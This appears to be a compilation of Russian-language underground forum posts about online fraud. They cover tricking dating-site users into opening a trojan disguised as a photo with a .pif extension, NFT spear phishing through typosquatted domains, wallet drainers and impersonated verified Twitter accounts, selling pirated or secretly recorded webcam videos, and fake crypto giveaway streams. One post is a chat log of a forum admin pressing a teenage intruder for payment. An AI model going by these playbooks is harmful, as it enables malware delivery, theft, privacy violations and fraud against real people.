Начнем по порядку. Первое - Идем в поисковик и через него находим сайты знакомств с бесплатной регой. Перед этим в том же поисковике находим фотки из домашнего архива девушек. Эт Сделать не так трудно как кажется. Зарегаться в мейле с женским именем и с таким же именем и логином зарегатся на сайте знакомств... Размещаем фоточки, пишем о себе, можна взять инфу с чужой женской анкеты ( чем сопливее тем лучше). Далее находим лезбиянок!!! Это очень важный момент НАНЕГО ОБРАТИТЬ ВНИМАНИЕ! Почему?? Да потому что если мы начнем спамить пацанов - то во-первых не все поведутся. А во вторых оч большие пожозрения ждут в вашу сторону дорогие мои коллеги инженеры)))... Так..Дальше думаем что будем впаривать?? У кого есть троян - замечательно... У кого фейк тож ниче... Задача такая. - писать бабам лезбиянкам что вы томитесь от желания с ней пошпиливилеть))).... Но вначале нужна обменятся фотками ( Акцент делайте на фотки в стиле Ню) ...Если просят выложить на сайт - категорически говорите что был печальный опыт, что вы выложили когда то фоточки свои и их какой то гребанный спамер скопировал и насоздавал 150 анкет с вашей фоткой). ...
Все...Сказка удалася. Вам присылают мейл ... а дальше дело техники... Через мейл отправляем троя... А Вообще вариантов уйма....))
Вы можете мне сказать что ттипа воооо пошли ща юзеры прохаваные и что например ехе ффайлик мой не откроют...Ну что ж господа... ВАо первых можна прикрепить иконку фотографии... Во вторых можна изменить расширение... Да да ..вы не ослышались... У исполняемых файлов много есть расширений..Не обязательно что это было .ехе
Есть к примеру pif Поверьте не все юзера догадываются что Пиф - эт исполняемый файлец... Тем более у вас будет стоять иконка фото... И юзер подумает что эт один из видов расширения изображений))))... Пробиваемая мощность такого приема 1 к 3.

В следующих наших уроках я буду говорить о таких мельких шалостей как на халяву пополнять се телефон... и куда лучше сливать это все бабло.... Пока пока мои братаны по разуму. С вами был Злодей Кот))

Вот собственно попал по глупости.Надо где раздобыть 70 вечнозеленых на покупки лецензии ипб.Кто может скиньте хоть немного вмз.Вечно буду благодарен. :blush:
Создал еще темки на дамаге,античате,варезу.нет,так как сам набрать не смогу

зы:сорри что создал тут тему.
ззы:никого кидать я не хочу,просто тут такая ситуация назревает. :not_i:

Code:Copy to clipboard

 Phantom (13:42:31 28/06/2006)
28/06/2006 (10:19 GMT  +03:00)
Слушаю вас

 Дела
 WT (13:42:52 28/06/2006)
насчет взлома 

 WT (13:43:02 28/06/2006)
стучуся

 Phantom (13:44:00 28/06/2006)
ааа

 Phantom (13:44:15 28/06/2006)
давай

 WT (13:44:23 28/06/2006)
забыл уже чтоли...тяжела работа сисадмина.Чего давать

 Phantom (13:45:59 28/06/2006)
все помню

 Phantom (13:46:09 28/06/2006)
есть результаты?

 Phantom (13:46:25 28/06/2006)
стоп какого взлома? именно

 Phantom (13:46:46 28/06/2006)
ау

 WT (13:47:02 28/06/2006)
Сегодня звонил мужик моего провайдера,типа я хакернул ваш форум

 Phantom (13:47:18 28/06/2006)
ок

 Phantom (13:47:18 28/06/2006)
понятно

 Phantom (13:47:23 28/06/2006)
Т.е. типа не хакал?

 WT (13:48:36 28/06/2006)
я нет..делать нех чтоли.Нафиг мне вас хакать,если у вас там ничего интересного нету.Тем более у меня щас тяжелая пора..экзаменов куча..завал.

 WT (13:49:08 28/06/2006)
а про что хоть форум то..

 Phantom (13:49:33 28/06/2006)
У меня есть логи доступа к серверу. Провайдер по ним восстановил телефон. Ниточки к вам, уважаемый

 Phantom (13:49:43 28/06/2006)
форум поддержки клиентов

 Phantom (13:50:28 28/06/2006)
http://warezu.net/forum/member.php?find=lastposter&f=4

 Phantom (13:50:36 28/06/2006)
ваша учетная запись?

 WT (13:50:40 28/06/2006)
а спутниковый нет то..не ломал.Просто на форуме был,у меня друг хакал.Все говорит зайди,да зайди.А это да мое

 WT (13:50:48 28/06/2006)
сознаюся

 WT (13:51:37 28/06/2006)
нет погодь..щас загружу..поторопился

 Phantom (13:51:38 28/06/2006)
Т.е. твой друг хакнул?

 Phantom (13:52:27 28/06/2006)
Ребята я так скажу. Замечено два IP адреса. С которых заходили

 WT (13:52:30 28/06/2006)
да..я в послднее время не хакаю,а именно с начала апреля.У меня экзамены.Да мой аккаунт

 Phantom (13:52:39 28/06/2006)
Вероятно после твоих слов это ты и твой друг

 WT (13:52:49 28/06/2006)
да я знаю..да блин

 Phantom (13:53:24 28/06/2006)
Вот так вот, друзья товарищи. Друга твоего найдут в скором времени, не волнуйся, хотя мне и тебя хватит, потом сами будете решать

 Phantom (13:53:52 28/06/2006)
Как возмещать ущерб будем?

 WT (13:54:41 28/06/2006)
а чего будет..только суда не надо.Могу форум поставить,если надо.Денежек у меня нету..самому приходиться сводить концы с концами для инета

 WT (13:57:34 28/06/2006)
я не пропал..просто нет закончился

 WT (13:58:19 28/06/2006)
ау..не молчи..у меня щас голова лопнет от напряжения

 Phantom (13:59:16 28/06/2006)
я с юристами общаюсь

 WT (13:59:25 28/06/2006)
нафиг

 Phantom (13:59:44 28/06/2006)
у нас крупная компания я один такие вещи не решаю

 WT (14:00:18 28/06/2006)
блин хоть бы все обошлось..у меня родаков инфаркт хватит.Да и мне щас это не к чему

 Phantom (14:01:02 28/06/2006)
Я предлагаю добровольно урегулировать этот вопрос без милиции, мне тоже не надо к ним бегать заявы писать

 WT (14:01:21 28/06/2006)
ок..согласен

 WT (14:03:42 28/06/2006)
я еще тут..просто нет еще впридачу лагает

 Phantom (14:04:28 28/06/2006)
Деньги я с вас взять не могу, без милиции это вымогательство

 WT (14:05:08 28/06/2006)
я ж говорю могу помочь поставить форум..темы посоздовать.Модераторы случаем не нужны

 Phantom (14:05:10 28/06/2006)
Поэтому ребятки, вы мне купите лицензию на Invision Power Board который вы мне сломали и будем в рассчете

 WT (14:05:23 28/06/2006)
а скока она стоит

 Phantom (14:05:56 28/06/2006)
http://www.ibresource.ru/products/invisionpowerboard/purchase/

 WT (14:05:59 28/06/2006)
да лучше поставить бажный форум,чем платить америкосам

 Phantom (14:06:03 28/06/2006)
должны были бы знать

 Phantom (14:06:44 28/06/2006)
Мы работаем легально.

 WT (14:06:46 28/06/2006)
мдаа..придется долго ждать...пока я столько денег найду

 Phantom (14:07:02 28/06/2006)
Короче с вас лицензия

 Phantom (14:07:13 28/06/2006)
А вы поторопитесь, а то терпение лопнет

 WT (14:07:19 28/06/2006)
блин мож без этого..слишком дорого.Я и так еле еле концы с нетом свожу

 Phantom (14:07:39 28/06/2006)
Вот с другом попилите

 WT (14:07:46 28/06/2006)
ну блин войди в положение мое...тем более я ничего не хакал

 Phantom (14:07:47 28/06/2006)
по 35 баксов с каждого

 WT (14:08:17 28/06/2006)
ага...на серфинге..по 02 вмз.Сколько ночей мне придется не спать

 Phantom (14:08:33 28/06/2006)
Понимаешь у меня убытков на 10000 будет

 Phantom (14:08:39 28/06/2006)
не меньше

 WT (14:08:45 28/06/2006)
из-за чего

 Phantom (14:08:52 28/06/2006)
мне всем клиентам сейчас поднимать новые аккаунты

 Phantom (14:09:04 28/06/2006)
писать заново статьи для ламеров

 WT (14:09:24 28/06/2006)
нафиг..могу статьи написать..любой физ труд..но не денежный

 Phantom (14:09:34 28/06/2006)
Вот не успел я их еще скачать на локальный, а вы тут еще все хакнули 

 WT (14:09:37 28/06/2006)
мне легче так помочь..чем тупо серфить

 Phantom (14:09:53 28/06/2006)
тебе сколько лет?

 WT (14:10:01 28/06/2006)
17..

 Phantom (14:10:10 28/06/2006)
а другу?

 Phantom (14:10:12 28/06/2006)
тоже?

 WT (14:10:16 28/06/2006)
да

 WT (14:10:24 28/06/2006)
так что легко загреметь

 Phantom (14:10:42 28/06/2006)
не ребята.... думайте

 Phantom (14:10:49 28/06/2006)
я свои условия сказал

 Phantom (14:11:01 28/06/2006)
другу превед

 WT (14:11:08 28/06/2006)
ну блин..я ж сказалл.могу помочь..мне 35 баксов..придется долго копить

 Phantom (14:11:15 28/06/2006)
Вас добавили


 WT (14:11:27 28/06/2006)
могу помочь с чем хочешь

 Phantom (14:11:38 28/06/2006)
думать надо было

 Phantom (14:11:45 28/06/2006)
либо ломать так чтобы не нашли

 WT (14:11:49 28/06/2006)
я не хакал блин

 Phantom (14:12:06 28/06/2006)
по барабану

 WT (14:12:18 28/06/2006)
ладно тогда придется серфить

 WT (14:12:33 28/06/2006)
только одно условие быстро не смогу

 Phantom (14:12:39 28/06/2006)
ты мне контакт друга сам даш, либо СБ провайдера будет искать?

 Phantom (14:13:06 28/06/2006)
или вы там сами между собой решите кто ломал, а кто нет?

 WT (14:14:04 28/06/2006)
88-902-530.А какой смысл решать кто ломал..100 процентов он будет отрицать..придется собирать мне одному 70 серфить.Он ведь ни одного вмз не даст

 Phantom (14:15:36 28/06/2006)
я так могу сказать, менты разберуться кто прав кто виноват. Но это на крайний случай

 WT (14:16:10 28/06/2006)
ментов сразу не надо

 Phantom (14:16:22 28/06/2006)
мне самому это нах не надо.

 WT (14:16:38 28/06/2006)
ладно блин успокойся..достану я где нить 70

 WT (14:16:59 28/06/2006)
блин а чего он так дорого стоит

Z300270514427
U107133281895
R952581505767
E146730073073

вот тут заводят блеки друг на друга

но с другой стороны многие не брезгуют впаривать пинч

короче : как вы определяете грамотная работа СИ или кидок ?

Всех приветствую!

В первой части статьи мы рассмотрели такие аспекты охоты на криптолохматых как:
- подготовка (аккаунты и прогрев)
- парс (на примере OpenSea)
- разведка (чек баланса, сбор базовой инфы)

Многие спросили меня, а что же делать дальше?
Сегодня я расскажу о нескольких интересных векторах атаки типа Spear phishing.

1. Начну я с одного из способов который я и мой коллега открыли случайным образом. В результате мы можем заставить Chrome перенаправлять пользователей с легитимного сайта на НАШ фишинговый.

Предыстория для понимания процесса :
- Мы выбрали нишевый сайт музыкальной NFT-коллекции
- Сделали точную копию без изменений, заменили ссылки на социальные сети на свои (фейковые)
- Главную кнопку на сайте сделали ведущей на WalletConnect (подключили дрейнер)
- В качестве трафика использовали Twitter Ads (даже без кло в качестве эксперимента)
- ВНИМАНИЕ - домен отличался от легитимного лишь ОТСУТСТВИЕМ 1 БУКВЫ в середине
- Организовали небольшой тестовый пролив
Примечание : оригинальная коллекция/сайт были уже малопопулярны на тот момент, когда мы решили пролить на фейк, соответственно их сайт также был малопосещаемым.
Результат : посещаемость фейка из-за пролива стала выше (наш фейк хорошо индексировался), при посещении ОРИГИНАЛЬНОГО сайта Chrome стал выдавать алерт:

Предположение почему так могло произойти :
- возможно алгоритмы Google определяют фишинговые сайты с минимально- отличимыми доменами на основе своих факторов репутации, таких как посещаемость.
Почему Google не изучает архивные копии, дату регистрации домена и тому подобное? Не знаю.
НО этот способ работает и мы уже разместили большое количество ловушек на NFT-проектах, которые были немного забыты и снимаем поклевку

СЛИЛ ВАМ РАБОЧИЙ СПОСОБ - ИСПОЛЬЗУЙТЕ
(возможно вы найдете применение и в других областях, не только NFT)

Таким образом вы можете генерировать траффик напрямую:
- С официальных Twitter-аккаунтов (там часто закрепляют ссылку)
- Из поисковой выдачи
- Из описания на YouTube, Instagram и т.п.
Так как теперь легитимный адрес будет направлять всех на ваш ФИШ

2. Вкатываемся в ленту выдачи Twitter.

Этот способ я упомянул в предыдущей статье, а сейчас расскажу непосредственно реализацию.
Предыстория: данный способ был придуман не мной в отличии от предыдущего, но я обнаружил его в алертах Twitter у одной из жертв, когда она рассказала как была обманута.

Когда Elon Musk добавил в Twitter подписку Blue (которая дает галочку около ника), Twitter был наводнен волной скама, т.к. на самом старте галочка по инерции внушала доверие.

Данным способом был похищен BAYC (NFT одной из самых популярных и дорогих коллекций) стоимостью **$185.000

Реализация атаки:**
- Выбираем NFT-коллекцию, аудиторию которой будем атаковать
- Верифицируем Blue
- Создаем МАКСИМАЛЬНО трастовый профиль (более 40к твитов, большое количество медиа, лайков, верифицированный NFT-аватар, желательно девушка, красивый .eth домен, накрутка подписчиков, лайки/репосты/просмотры на последние посты)
- Парсим МАКСИМАЛЬНОЕ количество холдеров и добавляем в базу
- Используя любой удобный софт/вручную делаем фолов на них
- Дожидаемся некоторое время ответного фолова (т. к. у вас красивый профиль даю гарантию почти на 30% отклик)
(ПРИ ВЗАИМНОМ ФОЛОВЕ ВАШИ ПОСТЫ ПОПАДАЮТ В ИХ ВЫДАЧУ)
- Когда взаимный фолов остановился и собрали максимальную аудиторию - переходим к следующему шагу
- Меняем АВАТАР и ИМЯ как у оригинального Twitter - ожидаем аппрува отTwitter (Elon твоя система модерации полное д@рьмо!)
- Делаем анонс МЕРОПРИЯТИЯ НО ТОЛЬКО НЕ AIRDROP и FREE MINT ПОЖАЛУЙСТА ЭТО RED FLAG
- Обязательно выдерживаем оригинальную стилистику (предварительно изучите) легитимного проекта, СДЕЛАЙТЕ КРАСИВОЕ КРЕО ПОТРАТЬТЕ 50$ НЕ ЖАЛЕЙТЕ
- Оставляем линк на ДРЕЙНЕР ( используем редактор текста, в тексте указываем настоящий домен, выделяем и делаем гиперссылку на фиш) (фишинговый домен обязательно должен также отличаться минимально, рекомендую терять/заменять/добавлять 1 букву в середине, т.к. это особенность психологии читать слова по началу и концу минуя середину) (ссылка на фиш в любом случае засветиться около поста ниже, поэтому отличия минимальны)
- Крутим лайки, просмотры на пост, комментарии можно отключить (возможно RED FLAG), в идеале затушить их со своих аккаунтов заранее также подготовленных, позитивными комментариями)

Данный способ атаки я видел только 1 раз в алертах (успешно) и ни разу не видел более, т.е. он живой и не применяется массово!
Все долбят @теги которые уже никого не заводят. ПОЭТОМУ ИСПОЛЬЗУЕМ пока дает

Для большего доверия можете оформить описание, стену и другие части аккаунта под оригинал (в идеале) + также пробуем изучать и находить наиболее активных амбассадоров проекта и косить под них, т.к. с моей точки зрения даже самый внимательный проще разведется на фейк-амбассадора, нежели фейк самого проекта, но и это тоже работает.

Продвинутый вариант если у вас есть немного кэша:
В случае прошлой атаки сама жертва указала в алерте, что НЕ заметила 1 отличие: фейковый Twitter был верифицирован как Blue, а оригинал как GOLD.

Как мы знаем, золотую галочку сейчас тоже сделать не проблема! Когда они появились количество фейк-инфлюенсеров зашкаливало.
Но чтобы не тратить 3000$ на одну атаку с высоким трастом (примерно столько стоит галка + услуга по оформлению) , сразу готовим несколько атак на несколько проектов.

Каким образом:
1. Создаем мама-аккаунт (основу) и верифицируем GOLD
2. Создаем аккаунты для пролива по схеме выше - нагоняем на них в фоловеры потенциальную аудиторию лохматых
3. Переименовываем / меняем аватарки на аккаунтах - верифицируем Blue
4. Вешаем с мама-аккаунта на аккаунты для пролива статус сотрудников И ВСЕ НАШИ АККАУНТЫ ПОЛУЧАТGOLD(придется немного доплатить за каждый)
5. Проливаем с аккаунтов с золотыми галками, теперь отличий в имени / аватарке / галке **НЕТ

3. Классический способ (адверт)**
Данный способ проще в реализации с точки зрения подготовки, но не отличается массовостью в отличии от предыдущих. Главная задача - инициация контакта - прогрев (интенсивность и характер зависит от легенды и подхода, наличия раздаточного материала) - завод.
Что использовать стиллер или дрейнер?
Я рекомендую держать в арсенале ОБА инструмента.
Так как сценария развития у нас четыре:

1. Человек знает об опасности загрузки стороннего ПО (в таком случае, возможно, ваш прогрев недостаточный/раздатка слабая/не смогли замотивировать)
2. Человек боится переходить по ссылкам / подключать кошелек (см. пункт выше, слабый прогрев/мотивация)
3. Человек не знает о стиллерах / дрейнерах.
4. Знает об обоих инструментах

При ЛЮБОМ из раскладов вы имеете все шансы завести! Почему?
Потому что у каждого мамонта есть список RED FLAGS в его голове, а-ля чек- лист.
Если вы смогли сделать качественный дизайн + соц. сети, раздатку - это 50%.
Вторые 50% это МОТИВАЦИЯ, т.е. главное заинтересовать!

Если вы смогли замотивировать - в 80% случаев мамонт ЗАКРЫВАЕТ ГЛАЗА НА ЛЮБЫЕ RED FLAGS и на него можно и нужно давить!

Можно использовать, как бы это не звучало, давление на любой этичной/неэтичной почве.
Простой вариант - на основе деловой репутации. Неэтичный вариант - религия. Да, это работает!

Я видел огромное количество логов/алертов применимо к мусульманским странам, где давили через этот вектор!
Не буду затрагивать мораль, но рассказал так как это имеет место быть/есть на практике.

Дословный пример из успешного лога:
- Мамонт загрузил софт
- Поймал детект
- Я клянусь алл@хом! Клянусь сердцем матери и головой сына, что тут нет вирусов! Ты готов ответить перед всевышним на суде за то, что назвал меня лжецом?
- Мамонт скипает АВ.

НИКОГО НЕ ХОТЕЛ ЗАДЕТЬ ЕСЛИ ЕСТЬ ПРЕДСТАВИТЕЛИ КОНФЕССИИ НА ФОРУМЕ!

Как понять какой чек-лист RED FLAGS, на что примерно ориентироваться?
- Вы можете посетить Discord любого крупного NFT-проекта, у каждого из них есть уголок безопасности где они рассказывают как отличить мошенника, на что обратить внимание - ИСПОЛЬЗУЕМ в обратную сторону!

Все что касается RED FLAGS, отработке возражений, СИ при скипе АВ, какую раздатку и как использовать - если вам интересно готов рассказать в следующей статье.

Всех люблю и желаю жирных профитов!**
Специально для XSS.is (XSS.as) от Албанца!**

Spoiler

Вебкам-модель термин, который на сегодняшний день активно вошёл в наш обиход. Это огромная индустрия сексуальных желаний, фантазий и извращений. На такие похотливые патишоу слетается со всего мира мужской и женский спецконтингент, который готов легко расстаться со своим капиталом и поделиться им не только с вебкам-моделями, но и передать денежные знаки в доверительное управление третьим лицам. Казалось бы, на этом можно закончить, но это далеко не конец истории…
Начну с рутины, но вы сами понимаете без этого никуда, хотя все практически возразят, что в вебкам-чатах никакого мастерства и особого умения не требуется, поэтому справится даже школьник первоклашка. Возможно, я возражать не буду, но правила хорошего тона, тоже никто не отменял.

Прежде всего помните львиная доля пользующихся услугами вебкам-моделей либо студенты, которые увы на всем экономят и сказать, что обожают халяву ничего не сказать, поэтому они чаще всего попрошайничают и клянчат, следовательно это не наш контингент; вторая категория намного перспективная, они обожают шалости, им страстно хочется новизны и всесторонней распущенности, которую увы не получить, внимание – в семье, да, да – это семейные папики (возраст обычно от сорока плюс), жизнь которых стала пресной и им хочется развеется с молоденькими модельками.

Далее я буду вести повествование фрагментами перспективного проецирования для лучшего восприятия и получения объемно пространственного мышления, то есть, как видит скамер и как это видит папик. Итак, мы на главной странице вебкам- чата, здесь представлен почти весь подиум моделей на любой вкус, конечно, все модельки разделены по категориям: блондинки, брюнеточки и т.д.

Spoiler

Папик, здесь видит на первом экране всех топовых моделек, которые на данный момент в режиме онлайн, разумеется посещалка у этих моделей от 1000 пользователей и более. Но пока на данном этапе папик в дрейфующем состоянии, как говорится эпитетов можно много привести, но самый подходящий – видит око, да зуб не имёт.

Скамер – тут намного всё профессиональнее, я знаю пароль, я вижу объектив, я вижу ориентир! Иначе говоря, цели у скамера и папика пока идентичны – ищем жертву, педантично прицениваясь: папики выбирают моделей, тщательно разглядывая гифки полуобнаженных нимф, а вот скамер ищет «рыбное место», где сегодня жор у папиков, то есть как раз акцентрируем внимание на объемы (количественную концентрацию, обычно это цифра расположена в правом нижнем углу гифки) посещалки того или иного чата модели.

Допустим с объектом определились, далее переходим ко второму шагу, а именно уже непосредственно переходим в чат вебкам-модели.

Spoiler

Если обратить внимание, то справа от вебтрансляции будет расположен публичный чат, у которого есть две вкладки.

Папики обычно тусят в самом чате: шлют комплименты, смайлики моделькам, так же там идёт история чата по передачи токенов, кто сколько закинул для разжигания страсти у моделей. Одним словом, там папики меряются пиписьками друг перед другом и подымают свой авторитет перед самой моделью, хотя стоит отметить, она уже предварительно может видеть у кого сколько на балансе токенов у её папиков с момента их входа в её чат до того, как они начнут тратить токены.

Скамеру же больше интересна вторая вкладка чата, которая показывает никнеймы самих папиков и тут внимание, обычно они расположены не в алфавитном порядке, а именно как раз по балансу токенов, хотя эта цифра публично не отображается. Так же здесь показано, кто сидит с какого устройства в чате, обычно это десктоп или мобильное средство, но нам будет интересна крайняя колонка в которой отображаются достижения папиков по иерархии на самом сайте вебкама. У каждого вебкама эти статусы разные, у Бонги иерархия следующая:

• GOLD – от 100 до 300 €
• PLATINUM - 303.03 €
• UNLIMITED - 1,303.03 €
• SAPPHIRE - 1,803.03 €
• TITAN - 2,803.03 €
• DIAMOND - 5,000.00 €
• EXCLUSIVE – свыше 10,000.00 €

Нам самый подходящий вариант со статусом GOLD, это те юзеры, которые уже сделали от одного до нескольких пополнений своего баланса для приобретения местной валюты, которая называется токенами, сам прайс выглядит так:

Spoiler

Если у вас возник вопрос почему именно, только эти папики будут нас интересовать, то отвечу, все остальные статусы сами видите получают пользователи, которые пополнились, так сказать, как будто в офлайне посетили салон для больших мальчиков со жрицами любви. Стоит отметить, что бывает ещё статус VIP, эти нас тоже не интересуют, вот ответ:

Spoiler

то есть у них бесплатный абонемент, так сказать. Конечно, опасайтесь пользователей, которые имеют статус Moderator – это местные стражи порядка, поэтому от них лучше держаться подальше. Если вернуться к самому списку пользователей в чате, то при клике на любом никнейме открывается всплывающее окно с возможностью написать личное сообщение:

Spoiler

Просмотреть расширенную информацию о папике, обращайте внимание на дату регистрации, обычно если она свежая, то такие новички традиционно менее осторожны и легко идут на контакт, хотя бывает встречаются случаи мультиаккинга (у одного и того же пользователя сразу несколько аккаунтов) или перерегистрации (прошлый аккаунт был забанен и папик по-новой зарегистрировался на сайте). Это всё речь про тех пользователей, которые сейчас онлайн, но можно добавить в свою базу для скама папиков, которые офлайн, а для этого всего-навсего достаточно просмотреть анкету вебкам-модели, в которой будет список её подписчиков и подписок:

Spoiler

Списки, как можете увидеть внушительные доходят до 10000 и более, но не обольщайтесь, тут могут быть мертвые души, пользователи, которые один раз пришли и больше потом не появлялись на сайте, поэтому лучше накапливать контакт-лист из тех, кто в онлайне.

Отдельно стоит заострить внимание на том, что конкретно у Бонги существует масса поддоменов для ГЕО-таргетинга пользователей, всё это сделано с целью, чтоб пользователи, например с IP-России не пересекались с пользователями, у которых IP-Франции. По сути, в онлайн трансляции русские будут видеть, как и французы одну и туже вебкам-модель, но в текстовом чате папики из России будут просматривать только комментарии на русском языке, а папики из Франции комментарии, которые оставляют французы, поэтому умение пользоваться VPN для смены своего IP-адреса, только приветствуется. Да, и в дальнейшем знание иностранных языков, как следствие будет весьма востребовано, ведь контингент будет интернациональный.

Вот плавно мы подошли после всех базовых установок к самой схеме скама, которая заключается в том, что папики помимо онлайн-трансляций, покупают охотно видеоролики смонтированные самими вебкам-моделями, сами видео размещаются на Бонге в профилях моделей:

Spoiler

Если обратите внимание, то ценник в 2000 токенов – это немного не мало 100 Евро, при этом внятного описания нет, какой продолжительности видео, какой сюжет и т.д. Реально кот в мешке! Папик - он считает себя прошаренным и в итоге стремится: "И на х#й сесть и рыбку съесть”, - (простите меня за такие эпитеты, но как говорится из песни слов не выкинешь), по сути, увидеть запретный плод и при этом не шибко раскошелится. А скамер, как Робин Гуд спешит на помощь.

Но что мешает нам самим делать подобного рода видео-контент с той или иной вебкам-моделью, а потом якобы в складчину приобретать этот видеоролик на двоих с каким-нибудь папиком из контакт-листа той или иной красавицы. Как папиков находить я уже выше показал, осталось дело за малым, это с кем-нибудь подружиться, втереться в доверие на различные темы, начиная от сегодняшнего настроения модели вплоть до её размеров молочных желез, зоны бикини, татуировок, пирсинга и т.д. Вот пример социальной инженерии для обработки одного из папиков:

Spoiler

После такой теплой беседы не забудьте добавиться к нему в друзья и у себя его зафрендить, чтоб потом было ещё проще строить отношения. Но возникает вопрос, где же взять видео, не покупать же его в конце концов? Ответ на этот вопрос тривиален, всё уже давно за нас придумано и сделано, тут есть два варианта.

Первый вариант, это взять уже готовое видео с торрент-трекера Порнолаб или аналогичных, на самом трекере расположены два интересующих нас раздела, это:

• Русские Порноролики Разное / Russian Clips (various)
• Русское любительское видео / Russian Amateur Video

Spoiler

если внимательно приглядитесь, то тут помимо Бонги есть и другие вебкамы, сами же трекеры удобно оформлены, так что мы можем с легкостью разыскать ту или иную модель по её никнейму, после того как искомый торрент будет найден, его необходимо загрузить к себе на ПК и потом перезалить на какое-нибудь онлайн- облако или виртуальный диск: Googledrive, Mega, ЯндексДиск и другие. После успешной загрузки на облако у нас будет расшаренный линк для удаленной загрузке этого файла сторонними пользователями. Нам стоит этот URL-адрес сохранить себе в записной книжке для дальнейшей работы по скаму папиков. А именно, когда уже установились дружественные отношения, можно переходить к активной схеме, это тот самый момент, когда можно смело им предлагать в складчину, мол приобрести видео той или иной вебкам-модели. Вариантов тут может быть много, я работаю по минималкам, то есть в полцены от суммы, которую установила сама модель, сам ценник дополнительно я ещё делю наполовину – получаю ту цифру долевого участия, которую необходимо перевести для покупки, заметьте я же платить ничего не буду, так как видео ролик не будет приобретаться у самой модели напрямую, более того сам этот ролик я бесплатно скачал с торрент-трекера и по итогам мой оппонент получит ссылочку на виртуальный диск, где я заблаговременно разместил этот видео контент. Так опытным путём я нашёл золотую середину, когда 25 Евро — это не так много, чтоб потерять для папика, но и не так мало, чтоб сэкономить - полтинник адекватный ценник на двоих. Обычно мелкие суммы не вызывают подозрения, никого не тяготят обязательствами, да и само желание поучаствовать в совместной хитрой махинации подкупает искренностью и заслуживает доверия со стороны оппонента, правда с европейцами караул, они как все на подбор: махинациям - «НЕТ», а изменам жен – «ДА», так что с ними надо немного иначе вести переговоры. Если не жадничать, быть на позитиве и проявлять скромность, то из десятка двух-трех папиков с которыми можно успеть пообщаться за день, то в среднем от 3-5 человек можно склонить к покупке в обычные будние дни. Просто надо принимать во внимание, что многие папики традиционно пополняют свой баланс в начале месяца, когда период получения заработанной платы, разумеется, они делают заначку для Бонги. Конечно, охотнее идут также на совместные покупки взрослые мальчики в конце рабочей недели, в пятницу и по праздничным дням.

Второй вариант получения видео контента немного сложнее, но также легко реализуем. Из необходимого софта дополнительно потребуется любое приложение для записи видео с рабочего стола монитора. Тут главное правильно настроить область захвата, так чтоб в кадр не попадали различные знаки авторского права (DMCA протектед и т.д.):

Spoiler

Достаточно будет записывать интересные моменты: сквирт, анальные игры и т.д., всё что будоражит головы папиков, после записи видео, делаем идентичные действия, что и в первом варианте. Загружаем на виртуальный диск, папика разматываем на складчину и впариваем ему наше видео, за это получаем нормальный лавандос себе на баланс. Схема поддается масштабированию, если в статье я продемонстрировал, как с нуля выйти на 30-50 долларов в день, то при реинвестировании этих средств, можно самим покупать приваты с вебкамщицами и при этом совмещать приятное с полезным, пока они творят свои кульбиты, расширяя все свои отверстия для меня, я в это время её эротические движения фиксирую на видео, разумеется ей об этом ни слова!

Спалю некоторую хитрость, которую я успешно использую, хотя на неё я наткнулся случайно, это когда видеотрансляция стрима вебкам-модельки заканчивается, чат остается ещё активным примерно 5-10 минут, поэтому сама модель как бы уже в офлайне, а папики ещё не успели разбежаться по другим девочкам, поэтому те кто ещё в чате пассивно сидят, я их обожаю драконить через личную переписку на складчину покупки видосиков и процент отказов в таких случаях то же минимален, многие готовы поучаствовать в разврате без личного присутствия хозяйки в чате.

Да, напоследок хочу сказать, что Бонга не единственный сайт для подобного рода скама, тем более сейчас, там многих папиков стали реально раздражать обычные спамеры по чатам со своими рекламно-зазывальными приглашениями в Whatsapp на пронпати, так что имейте это ввиду, что здесь, как и в любом бизнесе, есть, так сказать, в некотором роде конкурентная борьба. Поэтому подходящую площадку вебкам услуг сугубо под свои интересы вы можете подобрать на сайте - topcamslist.com, самые же трастовые площадки стоит отдельно выделить это: CAMS.COM, CHATURBATE, LIVEJASMIN, MYFREECAMS, STRIPCHAT, BONGACAMS, CAMSODA, STREAMATE, CAM4, IMLIVE, FLIRT4FREE, RUNETKI, SLUTROULETTE, XLOVECAM, CAMSTER, XCAMS, XVR CHAT, XHAMSTERLIVE, NUDELIVE, CAMFINDER, FAPCAM.CLUB, CHATRULETKAZ.

Че делать!?

Еще совсем недавно, была мода тна кошельки, при отправке денег на которые, возвращается гораздо большая сумма. При отсылании 1 рубля возвращалось 3. При отправке 3 - возвращалось 9. Ну а при отправке всех 100 баксов ничего естественно не возвращалось. Щас мода другая, причем более интересное.
Что первое мне пришло в голову - всегда отсылать 3 рубля - пусть возвращают. Так вот, хочу сказать всем, что ни 1 ни 3 рублей вам никто не вернет. на это все и расчитано. Таких проверяльщиков при эффективном СПАМе дофига. И по рублю с каждого - уже мнго. А тут недавно проспамили мою асю вот таким текстом:

привет %first! Извините за беспокойство, но количество мошенников на просторах Интернета растет пугающими темпами, в связи с этим предлагаю следящее:
мною был изобретен способ обмана "лохотронных программ", моей целью является его распространение.
Если Вы заинтересовались, зайдите на эту страничку lohotron- mustdie.narod.ru. Всего доброго!

Click to expand...

Ессно сайт lohotron-mustdie.narod.ru это тоже лохотрон. Только прикрывается благими целями и якобы рабочим действующим опытом. Подобных отростков мошенничества от одного и того же полно. Ясно что на обычный кошелек счастья никто не клюнет, так его можно немного модифицировать и какой нибудь 5-классник так и отправит десятку на поглощающий кошелек.

Нихао мои юные любители скама, сегодня я покажу вам как вася с деревни может заработать себе на ламборгини уже на следующие сутки.

Стал замечать что на просторах ютаба, все больше и больше начали всплывать накрученные трансляции с илон маском и ему подобных, aka Виталик Бутерброд aka МикроСтретеджи и Ко.

Сначало подумал, неужели на такой лоховоз еще кто то ведется ? Я эту нишу еще нашел лет 8 назад нашел, и думал она умерла, но как глубоко я ошибался.

https://muskx2.tips - скам

Зайдя на сайт, я увидел типичную схему, отправь 1бтц получи 2 обратно и так далее. Ну думаю я такой, кто на такую фуфайку сегодня поведется, но нет... Мамонтов оказалось более чем достаточно..

Вбил я их кошельки в эксплорер и увидел

0.16btc 2.8eth за сутки, думаю неплохо, притом что ты можешь запустить трансляцию прям с дома и купить на неё накрутку. Но это еще не всё.

Пошел я дальше бороздить по ютюбу, и увидел......... еще десятки подобных сайтов/трансляции и на одном из них было за сутки собрано более 150.000$. При условии что схема мамонт, изжила себя давно, лохи до сих пор ведутся причем даже неплохо, при хорошем раскладе за 10 дней можно нафармить 1кк $ А если запускать по 10 трансляции в день то тогда можно заработать еще больше. Ужас

Я никого и ни к чему не призываю, данный материал предоставлен исключительно в ознакомительных целях

Где почитать про СИ, книги, статьи, форумы итд.

